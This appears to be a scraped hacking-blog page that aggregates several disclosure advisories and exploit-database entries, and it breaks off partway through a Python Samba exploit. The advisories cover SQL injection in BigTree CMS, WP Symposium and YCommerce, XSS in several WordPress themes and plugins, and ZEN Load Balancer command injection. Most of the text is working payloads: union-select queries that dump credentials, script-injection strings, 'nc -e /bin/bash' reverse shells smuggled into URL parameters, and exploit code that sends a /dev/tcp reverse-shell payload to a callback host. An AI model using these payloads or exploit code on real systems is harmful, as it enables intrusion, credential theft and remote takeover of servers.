BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html
1. Introduction
Affected Product: BigTree CMS 4.2.3
Fixed in: 4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Vendor Contact: contribute@bigtreecms.org
Vulnerability Type: Multiple SQL Injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromisation
of the host.
Please note that you have to be authenticated to exploit this issue.
SQL Injection 1
The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.
Proof of Concept (Show all BigTree users):
http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0'
union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from
bigtree_users %23/
Code:
core/admin/modules/pages/view-tree.php:151; page id is user
controlled
$nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
$nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
$nav_archived = $admin->getArchivedNavigationByParent($page["id"]);
core/inc/bigtree/admin.php:2638
static function getArchivedNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");
core/inc/bigtree/admin.php:3167
static function getHiddenNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");
core/inc/bigtree/admin.php:3758
static function getNaturalNavigationByParent($parent,$levels = 1) {
[...]
$q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");
core/inc/bigtree/admin.php:4531
static function getPendingNavigationByParent($parent,$in_nav = true) {
[...]
$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");
SQL Injection 2
When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.
When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.
Proof of Concept:
1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places
Code:
core/inc/bigtree/admin.php:81
$f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));
SQL Injection 3 (Blind)
The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.
Proof of Concept:
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of
All Sizes
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of
All Sizes
Code:
core/admin/ajax/pages/get-seo-score.php:4:
$seo = $admin->getPageSEORating($_POST,$_POST["resources"]);
core/inc/bigtree/admin.php:4222
static function getPageSEORating($page,$content) {
[...]
if ($page["title"]) {
$score += 5;
// They have a title, let's see if it's unique
$r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));
3. Solution
To mitigate this issue please upgrade at least to version 4.2.3:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Please note that a newer version might already be available.
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor send Fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863152739
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
Vulnerability
================
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.
Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
Mitigations
================
Upgrade to version 15.8 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published
Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE:
# Category: remote
1. Product Description
Extract from the plugin page :
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."
2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'.
The issue is exploitable even if the plugin is deactivated.
3. Impact Analysis :
The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.
4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10
5. Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)
7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.
8. Personal Notes
I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-)
Source: https://github.com/kpwn/tpwn
tpwn
cve-2015-???? poc ~ os x 10.10.5 kernel local privilege escalation
vulnerability got burned in 10.11
full writeup #eta#son
shout out @ unthreadedjb 4 hax
Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37825.zip
source: https://www.securityfocus.com/bid/55597/info
WordPress is prone to multiple path-disclosure vulnerabilities.
Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
source: https://www.securityfocus.com/bid/55605/info
Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Purity 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>
The "ContactName" ,"email" ,"subject" ,"comments", variables are not
properly sanitized before being used
Exploit:
POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/
contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=
source: https://www.securityfocus.com/bid/55619/info
Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
source: https://www.securityfocus.com/bid/55622/info
The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected.
GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1
source: https://www.securityfocus.com/bid/55638/info
ZEN Load Balancer is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability
An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.
ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable.
http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/
source: https://www.securityfocus.com/bid/55653/info
YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
source: https://www.securityfocus.com/bid/55577/info
minimal Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
minimal Gallery 0.8.1 is vulnerable; other versions may also be affected.
htp://www.example.com/index.php?c=[XSS]
htp://www.example.com/PAth/index.php?s=[XSS]
htp://www.example.com/PAth/index.php?s=y&id=[XSS]
htp://www.example.com/PAth/index.php?m=[XSS]
htp://www.example.com/PAth/index.php?d=[XSS]
source: https://www.securityfocus.com/bid/55655/info
Samba is prone to an unspecified remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition.
#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
# found by eax samba 0day godz (loljk)
from binascii import hexlify, unhexlify
import socket
import threading
import SocketServer
import sys
import os
import time
import struct
targets = [
{
"name" : "samba_3.6.3-debian6",
"chunk_offset" : 0x9148,
"system_libc_offset" : 0xb6d003c0
},
{
"name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
"chunk_offset" : 4560,
"system_libc_offset" : 0xb20
},
{
"name" : "target_finder (hardcode correct system addr)",
"chunk_offset" : 0,
"system_libc_offset" : 0xb6d1a3c0,
"finder": True
}
]
do_brute = True
rs = 1024
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump(src, length=32):
result=[]
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02x"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04x %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
sploitshake = [
# HELLO
"8100004420434b4644454e4543464445" + \
"46464346474546464343414341434143" + \
"41434143410020454745424644464545" + \
"43455046494341434143414341434143" + \
"4143414341414100",
# NTLM_NEGOT
"0000002fff534d427200000000000000" + \
"00000000000000000000000000001d14" + \
"00000000000c00024e54204c4d20302e" + \
"313200",
# SESSION_SETUP
"0000004bff534d427300000000080000" + \
"000000000000000000000000ffff1d14" + \
"000000000dff000000ffff02001d1499" + \
"1f00000000000000000000010000000e" + \
"000000706f736978007079736d6200",
# TREE_CONNECT
"00000044ff534d427500000000080000" + \
"000000000000000000000000ffff1d14" + \
"6400000004ff00000000000100190000" + \
"5c5c2a534d425345525645525c495043" + \
"24003f3f3f3f3f00",
# NT_CREATE
"00000059ff534d42a200000000180100" + \
"00000000000000000000000001001d14" + \
"6400000018ff00000000050016000000" + \
"000000009f0102000000000000000000" + \
"00000000030000000100000040000000" + \
"020000000306005c73616d7200"
]
pwnsauce = {
'smb_bind': \
"00000092ff534d422500000000000100" + \
"00000000000000000000000001001d14" + \
"6400000010000048000004e0ff000000" + \
"0000000000000000004a0048004a0002" + \
"002600babe4f005c504950455c000500" + \
"0b03100000004800000001000000b810" + \
"b8100000000001000000000001007857" + \
"34123412cdabef000123456789ab0000" + \
"0000045d888aeb1cc9119fe808002b10" + \
"486002000000",
'data_chunk': \
"000010efff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"0000000800b0100000b0103f00000000" + \
"00b0100500000110000000b010000001" + \
"0000009810000000000800",
'final_chunk': \
"000009a3ff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"00000008006409000064093f00000000" + \
"00640905000002100000006409000001" + \
"0000004c09000000000800"
}
def exploit(host, port, cbhost, cbport, target):
global sploitshake, pwnsauce
chunk_size = 4248
target_tcp = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target_tcp)
n = 0
for pkt in sploitshake:
s.send(unhexlify(pkt))
pkt_res = s.recv(rs)
n = n+1
fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
pkt_res = s.recv(rs)
buf = "X"*20 # policy handle
level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS
buf+=struct.pack('<H',level) # level
buf+=struct.pack('<H',level)# level2
buf+=struct.pack('<L',1)#auditing_mode
buf+=struct.pack('<L',1)#ptr
buf+=struct.pack('<L',100000) # r->count
buf+=struct.pack('<L',20) # array_size
buf+=struct.pack('<L',0)
buf+=struct.pack('<L',100)
buf += ("A" * target['chunk_offset'])
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0xe8150c70);
buf+="AAAABBBB"
cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
tmp = cmd*(816/len(cmd))
tmp += "\x00"*(816-len(tmp))
buf+=tmp
buf+="A"*(37192-target['chunk_offset'])
buf+='z'*(100000 - (28000 + 10000))
buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]
n=0
for chunk in buf_chunks:
if len(chunk) != chunk_size:
#print "LAST CHUNK #%d" % n
bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
s.send(bb)
else:
#print "CHUNK #%d" % n
bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
s.send(bb)
retbuf = s.recv(rs)
n=n+1
s.close()
class connectback_shell(SocketServer.BaseRequestHandler):
